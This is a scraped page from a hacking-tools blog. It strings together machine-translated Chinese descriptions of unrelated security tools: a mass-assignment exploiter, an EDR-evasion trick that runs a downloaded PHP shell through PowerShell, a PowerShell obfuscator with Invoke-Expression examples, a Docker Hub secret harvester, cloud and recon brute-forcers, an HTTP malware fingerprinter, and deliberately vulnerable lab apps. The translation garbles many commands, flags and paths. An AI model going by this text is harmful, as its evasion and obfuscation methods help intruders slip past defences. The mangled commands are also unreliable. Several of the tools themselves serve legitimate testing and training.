Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    86385379

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking

群众委员

质量分配者是一种强大的工具,旨在识别和利用Web应用程序中的质量分配漏洞。它首先从指定的请求中检索数据来实现此目标,例如获取用户配置文件数据。然后,它系统地尝试将从响应中提取的每个参数应用于提供的第二个请求,一次是一个参数。这种方法允许对潜在的质量分配漏洞进行自动测试和开发。

免责声明

此工具积极修改服务器端数据。使用前请确保您有适当的授权。使用此工具的任何未经授权或非法活动完全符合您自身的风险。

功能

Enables the addition of custom headers within requests Offers customization of various HTTP methods for both origin and target requests Supports rate-limiting to manage request thresholds effectively Provides the option to specify 'ignored parameters' which the tool will ignore during execution Improved the support in nested arrays/objects inside JSON data in responses

下一个是什么

Support additional content types, such as '应用程序/x-www-form-urlenCoded'

安装用法

安装要求

pip3 install -r sumpliont.txt运行脚本

python3 mass_assigner.py-fetch-from'http://Example.com/path-to-fetch-data'-target-req'http://example.com/path-te-to-probe-te-probe-the-data'

参数

-h, - 赫尔普显示此帮助消息和退出

- 从fetch_from

URL从中获取数据

-target-req target_req

URL将修改的数据发送到

-H头, - 头标题

添加一个自定义标头。格式:'键:值'

-P代理, - proxy代理

使用代理,用法I.E: http://127.0.0.1:8080。

-d数据, - 数据数据将数据添加到请求正文中。 Json逃脱了。

- 利率限制速率_limit

每秒请求数

-source-method source_method

HTTP方法的初始请求。默认值为。

- 目标方法target_method

修改后请求的HTTP方法。默认为放置。

-ignore-params ignore_params

在修改过程中要忽略的参数,由逗号隔开。示例用法:

python3 mass_assigner.py -fetch-from'http://example.com/api/v1/me'-target-req'http://example.com/api/api/v1/me'--header'--header'授权: '{\'param1 \': \'test \',\'param2 \':true}'

A使LKM Rootkit再次可见。

该工具是将启动LKM Rootkit的研究的一部分。

,例如获取rootkit的“ show_module”函数的内存地址,并使用它来调用它,将其添加回LSMOD,从而可以删除LKM rootkit。

我们可以使用/sys/bernel/tracing/oparive_filter_functions_addrs中的非常简单的内核中获得函数地址,但是,仅可从内核6.5倍获得。

一种替代方法是扫描内核内存,然后再次将其添加到LSMOD,以便可以将其删除。

因此,总而言之,该LKM滥用LKM rootkit的功能,该功能再次可见。

OBS:还有另一个删除/切割LKM rootkit的技巧,但它将在研究中进行。

逃避Edr是简单的方法,没有触摸任何API的钩子。

理论

我注意到大多数EDR无法扫描脚本文件,仅将其视为文本文件。尽管这对他们来说可能是不幸的,但这是我们获利的机会。

诸如居住在内存或线程注入中的浮华方法受到大量监控。如果没有有效证书授权签名的二进制,几乎不可能执行。

输入Byosi(带上自己的脚本解释器)。每个脚本解释器都由其创建者签名,每个证书都是有效的。在实时环境中进行的测试显示出令人惊讶的结果:该存储库的高度签名的PHP脚本不仅在由CrowdStrike和Trellix监控的系统上运行,而且还建立了外部连接而没有触发任何EDR检测。 EDR通常会忽略脚本文件,而是专注于植入物交付的二进制文件。它们配置为检测二进制文件中的高熵或可疑段,而不是简单的脚本。

这种攻击方法利用了这一监督,以获得可观的利润。 Powershell脚本的步骤反映了开发人员首次进入环境时可能会做什么。值得注意的是,只有四行Powershell代码完全逃避EDR检测,而Defender/AMSI也对此视而不见。除了有效性外,Github担任可信赖的部位。

这个脚本做什么

PowerShell脚本通过四个简单步骤(技术上3):实现EDR/AV逃避

1.)它为Windows获取PHP档案,并将其提取到“ C: \ temp”中的名为“ php”的新目录中。

2.)然后该脚本继续获取Impulse PHP脚本或Shell,将其保存在相同的'C: \ temp \ php'目录中。

3.)之后,它使用白色PHP二进制(将二进制的大多数限制豁免将阻止二进制限制的大多数限制,这将阻止二进制运行。特别有趣的是,如果我的内存正确地为我服务,Sentinel One无法扫描PHP文件类型。因此,请随时让您的想象力疯狂。

免责声明。

我对滥用这一点绝不负责。这个问题是EDR保护方面的主要盲点,我只是将其引起所有人的注意。

感谢节

非常感谢@IM4X5YN74X亲切地称其为Byosi的名字,并帮助ENV测试将这种攻击方法带入生活。

编辑

似乎MS Defender现在正将PHP脚本标记为恶意,但仍然完全允许PowerShell脚本完全执行。因此,修改PHP脚本。

编辑

Hello Sentinel One :)可能要确保您制作未嵌入的链接。

AVvXsEi0Nkj2pYfytR3MP4aH6QnUVqrvmlVHLp3F

用GO编写的Powershell脚本混淆的工具。该计划的主要目的是混淆PowerShell代码,以使其分析和检测更加困难。该脚本提供了5个层次的混淆,从基本混淆到脚本碎片。这使用户可以根据其特定需求来量身定制混淆级别。

./psobf -h

██████╗███████╗███████╗██████╗

██╔══████╔════╝██╔═══════███╔═════╝

██████╔╝███████╗██║██████╔╝███████╗██║

██╔═══╝██╔═══╝

██║██║

╚═╝╚═══════╝╚════╝

@taurusomar

v.1.0

USAGE:/obfuscator -i inputfile -o outputfile -level 1 | 2 | 2 | 3 | 4 | 5

Options:

- 我字符串

PowerShell脚本文件的名称。

-Level int

混淆水平(1至5)。 (默认1)

-o字符串

混淆脚本的输出文件的名称。 (默认'obfuscated.ps1')

混淆级别:

1:基本的混淆,将脚本分为单个字符。

2: base64脚本编码。

3:替代基本64用不同的powershell解码方法编码。

4:脚本的压缩和基本64编码将在运行时解码和解压缩。

5:脚本分解为多个部分,并在运行时重建。

功能:

混淆级别:四个级别的混淆,每个级别都比上一个更为复杂。通过将脚本分配到单个字符中,Level 1观察。 2级基本64编码脚本。使用不同的powershell解码方法编码的3级替代基本64。脚本的4级压缩和基本64编码将在运行时解码和解压缩。 5级将脚本分解为多个部分,并在运行时重建。压缩和编码:级别4包括脚本压缩,然后在Base64中编码它。添加了可变的obfuscation:一个函数以混淆powershell脚本中的变量名称。随机字符串Generation:随机字符串是为可变名称混淆而生成的。AVvXsEi0Nkj2pYfytR3MP4aH6QnUVqrvmlVHLp3F

安装

GO安装github.com/taurusomar/psobf@latest

混淆级别的示例

混淆级别分为5个选项。首先,您需要有一个要混淆的powershell文件。假设您有一个名为script.ps1的文件,带有以下内容:

写作主持人“你好,世界!”

级别1:基本混淆

以1级混淆运行脚本。

./obfuscator -i script.ps1 -o obfuscated_level1.ps1 -level 1这将生成一个名为obfuscated_level1.ps1的文件,并带有混淆的内容。结果将是您脚本的一个版本,其中每个字符都被逗号分隔并在Runtime.Runtime.Runtime.Runtime(1级)$ obfuscated=$([char [char]]('w` w` w` w` w`, ``,'',`h` h` h` Invoke-Expression $ obfustated

级别2:base64编码

使用2级obfuscation :运行脚本

./obfuscator -i script.ps1 -o obfuscated_level2.ps1 -level 2这将生成一个名为obfuscated_level2.ps1的文件,其中base64中的内容。执行此脚本时,它将被解码并在Runtime.Result.Result(2级)$ obfuscated=[System.Text.Coding] :UTF8.GETSTRING([SYSTEM.CONVERT] 3:FROMBASE64STRING('V3JPDGUTSG9ZDCAISGVSBG8SIFDVCMXKISI='');调用表达$混淆

级别3:替代基本64编码

用3级obfuscation执行脚本:

./obfuscator -i script.ps1 -o obfuscated_level3.ps1 -level 3此级别使用PowerShell中的base64编码和解码的形式略有不同,添加了额外的offuscation.result.result(level 3)$ e==[System.Convert] : frombase64String('V3JPDGUTSG9ZDCAISGVSBG8SIFDVCMXKISI='); $ obfuscated=[System.Text.Coding] :UTF8.GETSTRING($ e);调用表达$混淆

级别4:压缩和基本64编码

用4级obfuscation执行脚本:

./obfuscator -i script.ps1 -o obfuscated_level4.ps1 -level 4此级别在base64中编码它之前会压缩脚本,从而使分析更加复杂。结果将在Runtime.Result(4级)$ compressed='H4SiaAaaAAAAAC+NIZCNJVL8PJUQQALRMFGWAAAAAA='; $ bytes=[system.convert] : frombase64string($ compressed); $ stream=new-object io.memorystream(,$ bytes); $ deckSpressed=new-object io.compression.gzipstream($ stream,[io.compression.compressionmode] :decompress); $ reader=new-object io.streamreader($ deckompresed); $ obfuscated=$ reader.readtoend(); Invoke-Expression $ obfuscated

级别5:脚本片段

使用5级obfuscation :运行脚本

./obfuscator -i script.ps1 -o obfuscated_level5.ps1 -level 5此级别片段将脚本片段分为多个部分,并在runtime.rantime.result.result.result(级别5)$ fragments=@(

'写-',

'输出'',

'你好,',

'wo',

'rld!',

'''

);

$ script=$ fragments -join'';

Invoke-Expression $脚本此程序用于教育和研究目的。它不应用于恶意活动。

AVvXsEhM6HGe3fxYS_u0m0-tgYJGnG8dFk6DwuEv

Dockerspy在Docker Hub上搜索图像,并提取敏感信息,例如身份验证秘密,私钥等。

什么是docker?

Docker是一个开源平台,可自动使用容器化技术对应用程序进行部署,扩展和管理。容器允许开发人员将应用程序及其依赖项打包成一个可以在各种计算环境中始终运行的单个便携式单元。 Docker通过确保应用程序运行相同的方式来简化开发和部署过程,无论其部署何处。

关于Docker Hub

Docker Hub是一个基于云的存储库,开发人员可以在其中存储,共享和分布式容器图像。它是最大的容器图像库,可访问Docker和社区成员图像创建的官方图像。 Docker Hub使开发人员可以轻松找到,下载和部署预构建的图像,从而促进快速应用程序开发和部署。

Docker Hub上的

为什么在Docker Hub上的Osint?

开源智能(OSINT)涉及使用公开可用的信息来收集来自Docker Hub上托管的容器图像和存储库的洞察力和数据。这对于确定裸露的秘密的原因尤其重要:

安全审核:通过分析Docker图像,组织可以发现暴露的秘密,例如API密钥,身份验证令牌和可能被无意中包括的私钥。这有助于减轻潜在的安全风险。

预防事件预防:主动在Docker图像中搜索暴露的秘密可以防止安全漏洞在发生之前,保护敏感信息并保持应用程序的完整性。

合规性:确保容器图像不暴露秘密对于满足监管和组织安全标准是残酷的。 OSINT有助于验证没有无意间披露的敏感信息。

漏洞评估:将暴露的秘密确定为常规安全评估的一部分,使组织能够及时解决这些漏洞,从而降低了恶意行为者的剥削风险。

增强的安全姿势:不断监视Docker Hub以实现秘密,可以增强组织的整体安全姿势,从而使其对潜在威胁的抵抗力更具弹性。

利用Docker Hub上的OSINT查找暴露的秘密,使组织能够增强其安全措施,防止数据泄露,并确保敏感信息在其容器化应用程序中的信心。

Docker Hub Leak euth Secrets,私钥Docker Hub图像上的成千上万张图像发现可暴露秘密和私钥

dockerspy的工作原理

Dockerspy从Docker Hub获取信息,并使用正则表达式来检查内容是否敏感信息,例如秘密。

入门

要使用Dockerspy,请按照以下步骤:

安装:克隆Dockerspy存储库并安装所需的依赖项。 git clone https://github.com/undeadsec/dockerspy.git cd dockerspy使使用:从终端运行dockerspy。 Dockerspy

自定义配置

要自定义Dockerspy配置,编辑以下文件:-正则表达式- 忽略的文件扩展

免责声明

Dockerspy仅用于教育和研究目的。用户负责确保使用此工具符合适用的法律法规。

欢迎

贡献

对Dockerspy的捐款!请随时提交问题,功能请求或提取请求以帮助改善此工具。

关于作者

Dockerspy由Alisson Moretto(uteadsec)开发和维护

我是密码网络威胁情报专业人士,他喜欢分享见解和制作网络安全工具。

考虑遵循ME:

DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more. (2) DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more. (3) DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more. (4)

谢谢

特别感谢@akaclandestine

AVvXsEhDSZHMyXiZrdj2WfsU7BKHbcVobLbdhFtl

侦察是渗透测试的第一阶段,这意味着在计划进行任何真实攻击之前收集信息,因此Ashok是一种令人难以置信的快速侦察工具,用于渗透测试仪,该工具是专门为侦察'title='Reconnaissance'Recneconsance阶段而设计的。在Ashok-V1.1中,您可以找到高级的Google Dorker和Wayback爬网机。

AVvXsEjKiJOBbdxgV_G8UyDxfYHPzftvrZ4Fkemq

主要功能

- Wayback爬行机机器

- Google Dorking无限制

- github信息抓取

- 子域标识符

-CMS/Technology Tactecter带定制标头

安装

〜GIT克隆https://GITHUB.COM/ANKITDOBHAL/ASHOK

〜CD Ashok

〜Python3.7 -M PIP3 Install -R Euncess.txt

如何使用Ashok?

详细用法指南可在Wiki的使用部分上找到。

但是一些选项索引在:以下给出

Extract Http Headers from single url Dump internet-archive machine with json output for single url Google dorking using number of results as dorknumber Dns Lookup of single target domain Subdomain Lookup of single target domain Port Scan using nmap of single target domain Extract data using Github username of target Detect Cms of target url

docker

Ashok can be launched using a lightweight Python3.8-Alpine Docker图像。

$ docker pull powerexploit/ashok-v1.2

$ docker集装箱运行- it powerexploit/ashok-v1.2--Help AVvXsEhDSZHMyXiZrdj2WfsU7BKHbcVobLbdhFtl

信用

HackerTarget

AVvXsEgJEBRadtN8ET1-LZLV7tR36taIfFax7os-

在顶级云提供商(Amazon,Google,Microsoft,Digitalocean,Alibaba,Fultr,Linode)上查找公司(目标)基础架构,文件和应用程序的工具。结果对于虫子赏金猎人,红色团队者和穿透测试人员都有用。

完整的写入可用。这里

动机

我们一直在想一些可以自动化的东西,以使黑盒安全测试更加容易。我们讨论了创建一个多个平台云蛮力猎人的想法。要查找托管在云上的开放存储桶,应用程序和数据库,并可能在代理服务器后面进行应用程序。

这是我们尝试修复的先前方法的列表问题:

separate words lack of proper concurrency lack of supporting all major cloud providers require authentication or keys or cloud CLI access outdated endpoints and regions Incorrect file storage detection lack support for proxies (useful for bypassing region restrictions) lack support for user agent randomization (useful for bypassing rare restrictions) hard to use, poorly configured

功能

Cloud detection (IPINFO API and Source Code) Supports all major提供商Black-Box(未经身份验证)快速(并发)模块化且易于自定义的跨平台(Windows,Linux,Mac)用户代理随机化代理代理随机化(HTTP,Socks5)

支持的云提供商

-1010 Microsoft3:-存储- 应用程序- 应用程序- 应用

Amazon:-存储- 应用程序

Google:-存储- 应用程序

Digitalocean:-存储

fuvtr:-存储

Linode:-存储

Alibaba:-存储

版本

1.0.0

用法

只需下载用于操作系统的最新版本,然后遵循使用情况即可。

为了充分利用此工具,您必须了解如何正确配置它。当您打开下载版本时,有一个配置文件夹,其中有一个config.yaml文件。

看起来像这样

Providers: ['Amazon','Alibaba','Amazon',“ Microsoft”,“ Digitalocean”,“ Linode”,“ Linode”,“ fultr”,“ Google”]#支持提供者

Environments: ['test','dev','prod','stage','staging','bak']#用于突变

proxytype:'http'#socks5/http

ipinfo:''#ipinfo.io api键ipinfo api,您可以在ipinfo上注册并获取免费的键,该环境(用于生成URL的环境,例如test-keyword.target.target.region和test.keyword.target.target.region等,等等。

我们提供了一些单词列表,但是最好在执行工具之前自定义和最小化您的单词列表(基于您的侦察)。

设置API键后,您可以使用CloudBrute。

██████╗██╗██████╗██╗██╗██╗██████╗██████╗██╗██╗

██╔════╝██║██╔═════███║

██║██║██║██║██║██║██║██████╔╝██████╔╝██║██║█████╗

██║██║██║█████║████║████╔══███║██═══██║██║

╚██████╗███████╗╚██████╔╝╚██████╔╝██████╔╝██████╔╝██║██║╚██████╔╝██║

╚══════╚═══════╝╚════╝╚════╝╚════╝╚════╝╚═══╝

V 1.0.7

USAGE: CloudBrute [-h | -help] -d | - Domain'value'-k | -keyword'value'value'

-w | -wordList'value'[-c | -cloud'value'] [-t | -threads

整数] [-t | -pimeout Integer] [-p | -proxy'value']

[-a | -randomagent'value'] [-d | -debug] [-Q | - que]

[-m | - 模式'value'] [-o | -utput'value']

[-c | -configfolder'value']

很棒的云枚举

参数:

-h--螺旋打印帮助信息

-D-域域

-k - 用来生成URL的关键字

-w-文字列表列表路径

-c - 云强制搜索,检查config.yaml提供程序列表

-t-线程数的线程数。 Default: 80

-t-秒内每个请求的超时时间秒。 Default: 10

-P- Proxy使用代理列表

-a-随机用户代理随机化

-d-示例显示调试日志。 default: false

-Q- quite抑制所有输出。 default: false

-M-模式存储或应用。 Default:存储

-O-输出输出文件。 default: out.txt

-c - configfolder配置路径。 default: config例如

CloudBrute -d target.com -k target -M存储-M存储-T 80 -T 10 -W'./data/storage_small.txt'请注意- 用于生成URL的关键字,因此,如果您希望完整的域是突变的一部分,则您已将其用于域(-d)和键盘(-K)参数

如果未检测到云提供商或希望在特定提供商上搜索强制搜索,则可以使用-c选项。

CloudBrute -D Target.com -K关键字-M存储-M存储-T 80 -W 10 -W -C Amazon -o Target_output.txt

dev

克隆repo go build -o CloudBrute main.Go Go Go Internal

在动作中

3:010 3:010 3

如何贡献

添加一个模块或修复内容,然后拉动请求。与您认为可以使用它的人分享。做额外的工作,并与社区

常见问题

如何从此工具中发挥最佳作用?

分享您的发现。

我会出现错误;我该怎么办?

请确保正确阅读使用情况,如果您认为发现错误打开问题。

当我使用代理时,我会遇到太多错误,或者太慢?

这是因为您使用公共代理,请使用私人和更高质量的代理。您可以使用Proxyfor与所选的提供商一起验证良好的代理。

太快还是太慢?

更改-T(超时)选项,以获取最佳效果。

信用

灵感来自此处列出的每个回购。

HireHackking

hfinger-指纹http请求

AVvXsEjIoQN5piNbjX18DFu8bFxIuHvoPpc4h7pO

用于指纹http恶意软件请求的工具。基于tshark,并在python3中撰写。工作原型阶段:-)

它的主要目的是提供恶意软件请求的独特表示(指纹),这有助于其识别。在这里,独特的意思是,每个指纹只能在一个特定的恶意软件家族中看到,但是一个家族可以具有多种指纹。 hfinger代表要求的要求,而不是打印整个请求,但仍然可以解释。

Hfinger可以用于手动恶意软件分析,也可以用于沙盒系统或SIEM中。生成的指纹对于分组请求,向特定恶意软件系列的请求指定请求,确定一个家庭的不同操作或发现其他安全系统省略但共享指纹的未知恶意请求。

学术论文伴随着此工具的工作,例如,与P0F,Fatt和Mercury相比,描述了设计选择的动机以及对工具的评估。

想法

该项目的基本假设是,不同恶意软件系列的HTTP请求或多或少是独特的,因此可以指纹以提供某种标识。 Hfinger保留了有关某些标头的结构和值的信息,以提供进一步分析的手段。例如,分组类似请求- 目前,这仍然是一项正在进行的工作。

在分析了恶意软件的HTTP请求和标题后,我们确定了一些请求的某些部分是最独特的。其中包括: *请求方法*协议版本*标头订单*流行标题的值*有效载荷长度,熵和非ASCII字符的存在

此外,还考虑了请求URL的一些标准功能。所有这些零件都被翻译成一组功能,在此处详细介绍。

上面的特征被转化为不同的长度表示,即实际指纹。根据报告模式,使用不同的功能来指纹请求。有关这些模式的更多信息如下。特征选择过程将在即将发表的学术论文中进行描述。

安装

安装之前需要最低要求: * python=3.3, * tshark=2.2.0。

可提供PYPI:的安装

PIP安装hfinger

Hfinger已在版本3.6.2中的TSHARK软件包上在Xubuntu 22.04 LT上进行了测试,但应使用Xubuntu 18.04上的2.6.10或Xubuntu 20.04上的3.2.3。

请注意,与任何POC一样,至少在Python虚拟环境中,您应该在单独的环境中运行hfinger。它的设置不在此处介绍,但是您可以尝试本教程。

用法

安装后,您可以直接从使用Hfinger的命令行或带有Python -M Hfinger的Python模块来调用该工具。

示例:

foo@bar:〜 $ hfinger -f /tmp/test.pcap

[{' '指纹: '2 | 3 | 1 | PHP | 0.6 | PO | 1 | US-AG,AC,AC-EN,HO,CO,CO,CO-TY,CO-LE | US-AG:F452D7A9/AC:AS-AS-AS/AC-EN3:ID/CO:KE-AL/CO-TY333:TE-PLESID-1.4 | 4 | 4 | 4长-Help Switches:

usage: hfinger [-h](-f文件| -d dir)[-o output_path] [-m {0,1,1,2,3,4}] [-v]

[-l logfile]

hfinger -PCAP文件中存储的指纹恶意软件HTTP请求

可选参数:

-h, - 赫尔普显示此帮助消息和退出

-f文件, - 文件文件读取单个PCAP文件

-d dir,-Directory dir

从目录DIR读取PCAP文件

-o output_path, - 输出路径output_path

输出目录的路径

-m {0,1,2,3,4},-mode {0,1,2,3,4}

指纹报告模式。

0-相似数量的碰撞和指纹与模式2,但使用较少的功能,

1-代表所有设计的功能,但比模式0、2和4的碰撞要多一些

2-最佳(默认模式),

3-生成的指纹数量最低,但碰撞数量最多,

4-最高的指纹熵,但指纹比0-2稍多

-v, - verbose报告有关请求中非标准值的信息

(例如,非ASCII字符,没有CRLF标签,配置列表中不存在的值)。

没有-logfile(-l)将打印为标准错误。

-l logfile,-logfile logfile

在详细模式下输出日志文件。暗示-v或- verbose开关。您必须提供PCAP文件(-F)或带有PCAP文件的目录(-D)的路径。输出为JSON格式。它将使用源文件的名称将其打印到标准输出或提供的目录(-O)。例如,命令的输出:

hfinger -f示例.pcap -o /tmp /pcap

将保存到:

/TMP/pcap/example.pcap.json

报告模式-M/-MODE可用于通过在0-4范围内提供整数来更改默认报告模式。在表示的请求功能或圆形模式上的模式不同。我们选择了默认模式(2)来表示通常在请求分析过程中使用的所有功能,但它也提供了少量的碰撞和生成的指纹。使用其他模式,您可以实现不同的目标。例如,在模式3中,您获得的生成指纹数量较低,但恶意软件家族之间发生碰撞的机会更高。如果您不确定,则不必更改任何内容。有关报告模式的更多信息在这里。

从0.2.1 Hfinger版本开始的详细信息。如果要接收有关请求的非付款部分中遇到的非标准值的信息,则应使用-v/- 详细信息,而不是crlf标签(\ r \ n \ r \ n),以及其他分析请求的问题,而不是应用程序错误。当在详细模式下遇到任何此类问题时,它们将被打印到标准错误输出中。您还可以使用-l/- 日志交换机将日志保存到定义的位置(这意味着-v/- 冗长)。日志数据将附加到日志文件。

在Python应用程序中使用hfinger

从版本0.2.0开始,Hfinger支持进口到其他Python应用程序。要在应用程序中使用它,只需从Hfinger.Analysis中导入Hfinger_Analyze函数,然后将其称为通往PCAP文件和报告模式的路径。返回的结果是带有指纹结果的DICES列表。

示例:

来自hfinger。分析导入hfinger_analyze

pcap_path='expefify_pcap_path_here'

reporting_mode=4

从版本0.2.1 hfinger使用记录模块开始print(hfinger_analyze(pcap_path,reporting_mode)))用于记录有关遇到的标头的非标准值的信息,请求的非付款部分中的非ASCII字符,缺少CRLF标签(\ r \ r \ n \ r \ f \ \ n)和其他分析的问题(\ r \ r \ n \ r \ n)和其他分析。 Hfinger使用名称hfinger创建了自己的记录器,但实际上没有事先配置日志信息被丢弃。如果要接收此日志信息,请在调用Hfinger_Analyze之前配置Hfinger Logger,将日志级别设置为logging.info,将日志处理程序配置为您的需求,将其添加到Logger中。 HFINGE_ANALYZE功能DocString中提供了更多信息。

指纹创建

指纹基于从请求提取的功能。完整列表中特定功能的使用取决于从预定义列表中选择的报告模式(有关报告模式的更多信息在这里)。下图代表在默认报告模式下创建示例性指纹。

AVvXsEjIoQN5piNbjX18DFu8bFxIuHvoPpc4h7pO

分析请求的三个部分以提取信息: URI,标头结构(包括方法和协议版本)和有效载荷。指纹的特定特征是使用|分开的(管道)。示例IS:生成的最终指纹

2 | 3 | 1 | PHP | 0.6 | PO | 1 | US-AG,AC,AC-EN,HO,CO,CO-TY,CO-LE | US-AG:F452D7A9/AC:AS-AS-AS/AC-EN:ID/CO-EN:ID/CO-3:KE-AL/CO-TY3333333333333:TE-PL

在指纹中以外观顺序描述了特征的创建。

首先,提取URI特征: * URI长度表示为对数的10个长度的基础,圆形为整数(示例中的URI为43个字符,log10(43)≈2), *目录数量, *目录数,(示例中,有3个目录), *平均目录,是平均值,固定为一个固定的固定时间,是一个固定的群体长度,该算法是一个固定的群体,该算法是实际的10个,实际上是10个,实际上是10个,实际上是10个,实际上是10个目录。 the example There are three directories with total length of 20 characters (6+6+8), so log10(20/3)≈1), * extension of the requested file, but only if it is on a list of known extensions in hfinger/configs/extensions.txt, * average value length represented as a logarithm with base 10 of the actual average value length, rounded to one decimal point, (in the example two values have the same length of 4 characters, what is显然等于4个字符,log10(4)≈0.6)。

其次,分析标头结构功能: *请求方法编码为方法(PO)的前两个字母, *协议版本编码为整数(1.1版1.1版1.1版,版本为1.0,版本为0.9,为0.9), *标题的顺序*, *标题的顺序, *和流行的标题及其值及其值。

为了在请求中表示标题的顺序,例如,根据Hfinger/configs/headerslow.json中的架构编码每个标头的名称,例如,用户代理标头被编码为US-AG。编码名称由,如果标题名称不是从上限字母开始(或分析化合物编码等复合标题时的任何部分),则将编码表示为!如果标题名称不在已知的标题列表中,则使用FNV1A哈希(FNV1A Hash)进行哈希,并且哈希被用作编码。

分析流行标题时,请检查请求是否出现在其中。这些标题为: *连接*接受编码*内容编码* CACHE-CONTROL * TE * ACCEPT-CHARSET * content-type *接受*接受*接受语言*

当在请求中找到标题时,将根据典型值表检查其值,以创建对header_name_representation的对成对。标头的名称根据hfinger/configs/headerslow.json中的架构编码(如前所述),并且根据存储在hfinger/configs目录或configs.py文件中的架构编码该值,取决于标题。在上面的示例中,接受为AC及其值*/*为AS-AS(ASTERISK-ASTERKISK),提供AC:AS-AS。对在请求中以外观顺序插入配对,并使用/进行界定。如果在编码表中找不到标题值,则使用FNV1A哈希进行哈希。

如果标题值由多个值组成,则将它们进行令牌化以提供界定的值列表,例如Accept:*/*,Text/*将提供AC:AS-AS,AS,Te-As。但是,在此开发点,如果标题值包含一个“质量值”标签(q=),则使用其FNV1A哈希编码整个值。最后,使用其FNV1A哈希直接编码用户代理和接受语言标头的值。

最后,在有效载荷中,有: *的存在非ASCII字符,并用字母n表示,否则*有效载荷的Shannon熵(圆形为一个整数*和有效负载长度)表示为对数,其底数为10个实际有效载荷长度的基础10,圆形为一个小子。

报告模式

Hfinger以五个报告模式运行,在指纹中表示的功能不同,因此从请求中提取的信息。 These are (with the number used in the tool configuration): * mode 0 - producing a similar number of collisions and fingerprints as mode 2, but using fewer features, * mode 1 - representing all designed features, but producing a little more collisions than modes 0, 2, and 4, * mode 2 - optimal (the default mode), representing all features which are usually used during requests' analysis, but also offering a low number of collisions and generated指纹, *模式3-从所有模式产生最低数量的生成的指纹,但达到最高数量的碰撞, *模式4-提供最高的指纹熵,但也比模式0-2产生更多的指纹。

选择模式以优化Hfinger的功能,以识别恶意软件系列与生成的指纹数量。模式0、2和4提供了恶意软件家族之间类似数量的碰撞,但是,模式4产生的指纹比其他两个要多。模式2代表比模式0的请求功能更多,其生成的指纹和碰撞数量可比。模式1是唯一代表所有设计功能的模式,但与模式0、1和4相比,它的碰撞数量将近两次。模式3的指纹至少比其他模式少两次,但它引入了大约9倍的碰撞。所有设计功能的描述都在这里。

模式由特征(在指纹中的外观顺序)组成: *模式0: *目录数, *平均目录长度表示为整数, *请求文件的扩展* *平均值长度表示为float, * float, * ever of float, * ever of tloaters, *流行的标头及其值, * PAIRE LONDAL及其值, * PAIRE LONCAL LENVES代表浮点。 * mode 1: * URI length represented as an integer, * number of directories, * average directory length represented as an integer, * extension of the requested file, * variable length represented as an integer, * number of variables, * average value length represented as an integer, * request method, * version of protocol, * order of headers, * popular headers and their values, * presence of non-ASCII characters, * payload entropy represented作为整数, *有效载荷长度表示为整数。 *模式2: * uri长度表示为整数, *目录数, *平均目录长度表示为整数, *延长所请求的文件的扩展, *平均值长度表示为float表示, *请求方法, * repoction- * soptast ofstroop, * sobles of标题的订单, *流行标题及其价值, *均值范围为无用的范围,是一个无效的载荷, *如有有效载荷为*, *作为一个余额,作为一个余数,作为* fore lofe n fore note lofe n fore to lobal to lobal to lofe n fore n fore n fore to lofe to lofe noce tlo longe to * to lofe tlo。 *模式3: * URI长度表示为整数, *平均目录长度表示为整数, *请求文件的扩展名, *平均值长度表示为整数, *标头的顺序。 * mode 4: * URI length represented as a float, * number of directories, * average directory length represented as a float, * extension of the requested file, * variable length represented as a float, * average value length represented as a float, * request method, * version of protocol, * order of headers, * popular headers and their values, * presence of non-ASCII characters, * payload entropy represented as a float, * payload length表示为浮子。

AVvXsEjhkbtFHEZYZ2XWPDOmuQB510cU5uUDArQC

使用Node.js,Express Server和EJS模板引擎制作的脆弱应用程序。该应用仅用于教育目的。

设置

克隆此存储库

GIT克隆https://github.com/4auvar/vulnnodeapp.git

应用程序设置:

安装带有NPM的最新node.js版本。打开终端/命令提示符并导航到下载/克隆的存储库的位置。运行Command

db设置

NPM安装

设置基本环境变量

安装并配置最新的MySQL版本,并在MySQL中使用root用户启动MySQL Service/Deamon登录,并在SQL Squl Script: Create Create user'vernnodeapp'@local-host@local-host creation'@'local-host wiake'suppasion'确定。

创建数据库vuln_node_app_db;

授予vuln_node_app_db上的所有特权。

使用vuln_node_app_db;

创建表用户(ID INT AUTO_INCREMENT主键,FullName Varchar(255),用户名Varchar(255),密码VARCHAR(255),电子邮件Varchar(255),Phone Varchar(255),ProfileSepic varchar(255));

插入用户(fullName,用户名,密码,电子邮件,电话)值('test1','test1','[EmailProtected]','976543210');

插入用户(fullname,用户名,密码,电子邮件,电话)值('test2','test2',[emailProtected]','9887987541');

插入用户(fullname,用户名,密码,电子邮件,电话)值('test3','test3',[emailProtected]','9876987611');

插入用户(fullname,用户名,密码,电子邮件,电话)值('test4','test4',[emailProtected]','9123459876');

插入用户(fullName,用户名,密码,电子邮件,电话)值('test5','test 5',[emailProtected]','7893451230');

启动服务器

用户需要设置以下环境变量。database_host(e.g: localhost,127.0.0.1等.)database_name(e.g: vuln_node_app_app_db或db cripts in divabase_user(e.g3333333333333:) DATABASE_PASS (E.g: password or password you change in above DB script)

涉及的漏洞

Open the command prompt/terminal and navigate to the location of your repository Run command: npm start Access the application at http://localhost:3000

todo

SQL Injection Cross Site Scripting (XSS) Insecure Direct Object Reference (IDOR) Command注射任意文件检索正则表达式注入外部XML实体注入(XXE)节点JS避免安全性错误配置INSECURE会话管理

问题

将增加新的漏洞,例如CORS,模板注入等.改进应用程序文档3

贡献

,在应用程序中,在应用程序中,在应用程序中免费创建一个问题。010-1010随时为任何贡献创建拉动请求。你可以通过@4auvar与我联系

AVvXsEjotSIJejjnOiN1ePrfhx9cT-jH_g00-YoZ

XM山羊由XM网络地形模板组成,可帮助您了解常见的Azure安全问题。每个模板都是一个脆弱的环境,具有一些重大的配置。您的工作是攻击和妥协环境。

这是每个环境的工作:

运行安装然后开始。

使用初始用户和服务主凭据,根据方案流攻击环境(例如,xmgoat/scenarios/saceario_1/saceario1_flow.png)。

如果您需要在攻击方面的帮助,请参阅解决方案(例如,XMGOAT/scenarios/scenario_1/solution.md)。

学习攻击后,清理。

要求

Azure房客Terafform版本1.0.9或更高版本Azure CLI Azure Azure用户具有所有者在AAD

安装

中的所有者权限和全局管理权限

$ AZ登录

